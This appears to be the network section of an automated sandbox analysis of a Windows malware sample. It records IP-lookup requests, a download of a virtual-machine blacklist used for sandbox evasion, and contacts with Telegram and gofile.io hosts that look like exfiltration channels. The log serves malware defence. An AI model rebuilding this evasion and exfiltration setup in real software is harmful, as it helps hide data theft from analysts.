                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com52.20.41.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com3.90.94.202A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                          • raw.githubusercontent.com
                                                                                                                                                                                                                                                          • ip-score.com
                                                                                                                                                                                                                                                          • api.telegram.org
                                                                                                                                                                                                                                                          • api.gofile.io
                                                                                                                                                                                                                                                          • store6.gofile.io
                                                                                                                                                                                                                                                          • szurubooru.zulipchat.com
                                                                                                                                                                                                                                                          • icanhazip.com

                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449731188.138.68.212804924C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.428119898 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.767261982 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.782089949 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:14.183336973 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.906322956 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.307580948 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.312499046 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.713689089 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.047889948 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.448875904 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.454797983 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.856147051 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.191031933 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.592215061 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:18 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.597872972 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.999650955 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.298873901 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.702651978 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:40 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.708468914 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:38.114833117 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:41 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.421812057 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.824068069 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:59:02 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.829591990 CET66OUTGET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:59:00.231179953 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:59:03 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449740104.16.184.241804828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.237080097 CET63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: icanhazip.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:17.333091974 CET535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                          Set-Cookie: __cf_bm=L13S0GP2ETX5a_Ef.sPicFLgx2nADMPIrWabJhw3HxM-1732874237-1.0.1.1-AIQJtokoSn4OZk4S5XUTdD0v4cczqjlP7Fm26qUghTWNds9Ok9WizpdfeJxcsJSuFnc8vcyPABFYMV4sTObm1Q; path=/; expires=Fri, 29-Nov-24 10:27:17 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8ea1bb8e5f9d5e7c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                                                                                                                          Data Ascii: 8.46.123.228


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449741104.16.184.241804828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.299601078 CET39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: icanhazip.com
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:20.484688044 CET535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                          Set-Cookie: __cf_bm=8AHEjhpTt9IjeNLKhYvFexBOuk875rJ_88OJsz0l27M-1732874240-1.0.1.1-lW6aIg6YSUKhpkWRDjRGTa1J3ElNitillAfNom.i2HN3urRAn0u4qRhqTUt2YyrOg.uIObTlB178u9uli7vdjA; path=/; expires=Fri, 29-Nov-24 10:27:20 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8ea1bba1fb6f8c27-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                                                                                                                          Data Ascii: 8.46.123.228


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.449746104.16.184.241804828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.451260090 CET63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: icanhazip.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.589025974 CET535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:27 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                          Set-Cookie: __cf_bm=W64ch7iFz1Nni4C00E9.7SAl4b2Y6VVFDmwboiZbhIQ-1732874247-1.0.1.1-e6toI7G0jFg4OAHzdJ331BrgIj6cm_bj..jcWFOqKZDFphCiBzpPhpH_4s00k90mnFvldgdhdVkXk4nR8_NT0A; path=/; expires=Fri, 29-Nov-24 10:27:27 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8ea1bbce5ef68c84-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                                                                                                                          Data Ascii: 8.46.123.228


                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449732185.199.110.1334434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC124OUTGET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 3145
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: E79B:24F1AE:A7DC9:B6584:67498FF6
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-nyc-kteb1890081-NYC
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 1
                                                                                                                                                                                                                                                          X-Timer: S1732874233.518753,VS0,VE1
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: d9556e9daaeeaadb578a7d707e3198bd8b9265f0
